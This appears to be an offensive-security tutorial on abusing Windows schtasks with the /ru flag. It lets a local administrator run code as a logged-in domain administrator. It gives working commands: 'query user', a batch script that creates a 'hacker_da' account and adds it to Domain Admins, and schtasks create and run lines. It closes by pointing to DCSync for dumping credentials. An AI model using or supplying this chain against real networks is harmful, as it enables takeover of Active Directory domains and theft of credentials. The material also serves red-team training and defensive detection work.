Schtasks overview:
By default any user can create scheduled tasks for themselves using Windows' built in task scheduler. This can be leveraged for continued access easily enough, but what if we were a local administrator?
Local administrators can create tasks for any user the local system knows about. This can of course be any local accounts on the computer, including the built in administrator account, and even System if you use the /rl (run level) highest flag.
While this is nice and can provide some fun silly ways to get system, there's another more damaging thing we can do with this.
schtasks.exe has a /ru flag which stands for run user. With this flag you can specify the account for the task to run as. This can include domain users!
Domain users can only execute domain actions under two very specific circumstances. The first is if the user is actively logged into the machine, giving them a valid kerberos ticket. The second is if a specific Hyper-V setting is enabled. That setting is not enabled by default.
Your best option is to see if a domain account is logged into the computer actively. If they are you can run commands against the domain.
Exploitation
If you happen to get local admin on a machine that a domain administrator is logged into then you can use this trick to run commands as a domain admin!
First you can check which users are logged into a machine using either a netexec module, or the built in query command.
query user
This will list the accounts, if a DA is logged in you're golden!
I like to use a batch script to add a new DA to the domain in order to exploit this.
An example is:
@Echo off
echo %date% %time% >> C:\temp\bat_logs.txt
echo "triggered" >> C:\temp\bat_logs.txt
net user hacker_da password /add /domain >> C:\temp\bat_logs.txt && echo "account created" >> C:\temp\bat_logs.txt || echo "error making user" >> C:\temp\bat_logs.txt
net group "domain admins" hacker_da /add /domain /Y >> C:\temp\bat_logs.txt && echo "hacker added to domain admin group" >> C:\temp\bat_logs.txt || echo "error adding user to group" >> C: \temp\bat_logs.txt
echo "finished" >> C:\temp\bat_logs.txt
Then you can add a task using the following command:
schtasks /create /sc ONIDLE /i 10 /tn Privesc /tr "C:\path\to\bat\file.bat" /ru domain\user_you_want_to_run_the_bat_as /rl HIGHEST
Once the task is added you can execute it with the following command:
schtasks /run /rn Privesc
Now you have a DA whose password you know, and you can DCSync!